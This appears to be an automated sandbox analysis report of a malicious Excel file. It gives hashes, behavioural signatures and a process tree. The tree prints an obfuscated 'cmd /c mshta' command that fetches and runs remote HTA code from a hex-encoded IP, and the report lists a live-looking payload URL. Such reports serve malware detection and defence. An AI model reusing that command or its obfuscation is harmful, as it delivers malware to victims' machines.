Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 20:48
Behavioral task
behavioral1
Sample
ecc7d67a95a0bc100a6eebc60573de7ff556da84c43137adf9b23c6fbd5fb0d7.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ecc7d67a95a0bc100a6eebc60573de7ff556da84c43137adf9b23c6fbd5fb0d7.xls
Resource
win10v2004-20241007-en
General
-
Target
ecc7d67a95a0bc100a6eebc60573de7ff556da84c43137adf9b23c6fbd5fb0d7.xls
-
Size
142KB
-
MD5
cf35dd57ccc743ae5aef84255b30ef70
-
SHA1
0d39383fe20e21a41174191976386b1d93c51ddd
-
SHA256
ecc7d67a95a0bc100a6eebc60573de7ff556da84c43137adf9b23c6fbd5fb0d7
-
SHA512
c3c2652136fac4be4b3d8dcbf0e782379a17427e5758e1ae3bee12b86bd21b677c4e1ca366d2f923a2610d1212a45ef36e4a600eca38ad7e48b04fc73d92028b
-
SSDEEP
3072:4Rk3hbdlylKsgqopeJBWhZFGkE+cL2NdAlhEvN8B/W6X1yxYovrepMUdQ6gSz4iq:Qk3hbdlylKsgqopeJBWhZFVE+W2NdAli
Malware Config
Extracted
http://185.7.214.7/fer/fer.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2216 1232 cmd.exe EXCEL.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
mshta.exeflow pid process 4 2832 mshta.exe 7 2832 mshta.exe -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
mshta.exeEXCEL.EXEcmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1232 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
EXCEL.EXEpid process 1232 EXCEL.EXE 1232 EXCEL.EXE 1232 EXCEL.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
EXCEL.EXEcmd.exedescription pid process target process PID 1232 wrote to memory of 2344 1232 EXCEL.EXE splwow64.exe PID 1232 wrote to memory of 2344 1232 EXCEL.EXE splwow64.exe PID 1232 wrote to memory of 2344 1232 EXCEL.EXE splwow64.exe PID 1232 wrote to memory of 2344 1232 EXCEL.EXE splwow64.exe PID 1232 wrote to memory of 2216 1232 EXCEL.EXE cmd.exe PID 1232 wrote to memory of 2216 1232 EXCEL.EXE cmd.exe PID 1232 wrote to memory of 2216 1232 EXCEL.EXE cmd.exe PID 1232 wrote to memory of 2216 1232 EXCEL.EXE cmd.exe PID 2216 wrote to memory of 2832 2216 cmd.exe mshta.exe PID 2216 wrote to memory of 2832 2216 cmd.exe mshta.exe PID 2216 wrote to memory of 2832 2216 cmd.exe mshta.exe PID 2216 wrote to memory of 2832 2216 cmd.exe mshta.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ecc7d67a95a0bc100a6eebc60573de7ff556da84c43137adf9b23c6fbd5fb0d7.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2344
-
-
C:\Windows\SysWOW64\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\SysWOW64\mshta.exemshta http://0xb907d607/fer/fer.html3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2832
-
-